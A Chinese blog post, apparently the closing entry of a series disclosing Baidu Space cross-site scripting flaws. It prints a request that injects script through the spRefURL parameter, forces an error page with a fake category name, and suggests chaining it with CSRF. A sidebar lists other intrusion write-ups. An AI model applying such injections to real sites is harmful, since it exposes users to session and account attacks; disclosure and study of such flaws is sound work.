|
[组图]百度跨站漏洞谢幕篇
先把漏洞讲完,再开始扯淡。
今天的第一个漏洞还是出在spRefURL上
XSS 13: 百度空间创建文章错误返回XSS漏洞
在写博客的地方,如果提交时篡改spRefURL为恶意脚本,此时若提交失败,则返回页面中会包含我们的恶意脚本。
在创建文章时提交参数如下:
| 以下是引用片段: ct=1&cm=2&spBlogID=1f9a3aacaff38d0c4b36d6f5&spBlogCatName_o=%C4%AC%C8%CF%B7%D6%C0%E0&edithid= &spRefURL=http%3A%2F%2Fhi.baidu.com%2Ftestuser%2Fmodify%2Fblog%2F1f9a3aacaff38d0c4b36d6f5‘)”><script>alert(/XSS/);</script><”(’ &spBlogTitle=xxxxxxxxxx&spBlogText=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&spBlogCatName=%C4%AC%C8%CF%B7%D6%C0%E0nonexist &spIsCmtAllow=1&spBlogPower=0&spVcode=&spVerifyKey=&tj=+%B1%A3%B4%E6%D0%DE%B8%C4+ |
而输入一个错误的
spBlogCatName
构造一个不存在的类名,以造成错误返回页面。
返回页面的代码如下:
| 以下是引用片段: <!–STATUS OK–> <html><head><meta http-equiv=content-type content=”text/html; charset=gb2312″> <link rel=”stylesheet” type=”text/css” href=”/space.css”> …… 指定的分类名不存在,请重试<br> <a href=”####” onClick=”javascript:erReturn(’http://hi.baidu.com/testuser/modify/blog/1f9a3aacaff38d0c4b36d6f5‘)”><script>alert(/XSS/);</script><”(’‘);return false;”>返回!</a> <script language=”javascript”> errdetails=”指定的分类名不存在,请重试。”; setTop(); </script> …… <!– 2.文章修改 –> <script language=”javascript”> <!– writestr(”文章修改失败!”); //–> </script> </div> </body> </html> |
在具体利用时候,可以参考我在Day 02中举例的构造表单提交的方法,来触发这个XSS。
在一定的时候,将CSRF变成“XSRF”,威力会更加巨大。
希望我说的大家能明白,这里为了偷懒就不做演示了,你只需知道能直接从CSRF触发XSS就行了
接下来讲讲自定义模板的问题
| 实例讲解跨站入侵攻防战之攻击篇 | 05-08 |
| 对偶偶娱乐分站服务器的安全检测 | 04-23 |
| 入侵88red系统的详细过程 | 04-07 |
| 对趋势科技等数万网站被攻击的分 | 03-21 |
| 凡人网络购物系统 V8.0 简体中文 | 03-18 |
| linux平台下渗透日本著名XXXXXX. | 03-18 |
| 搜索框所引起的XSS漏洞 | 03-05 |
| 跳转漏洞的利用 | 03-05 |
| 对复旦大学的一次漫长渗透 | 03-03 |
| .net一句话马以及dx论坛拿shell | 03-01 |
| php渗透入侵过程图文详解 | 03-01 |
| DJ网站的入侵详细过程 | 02-26 |
您现在的位置: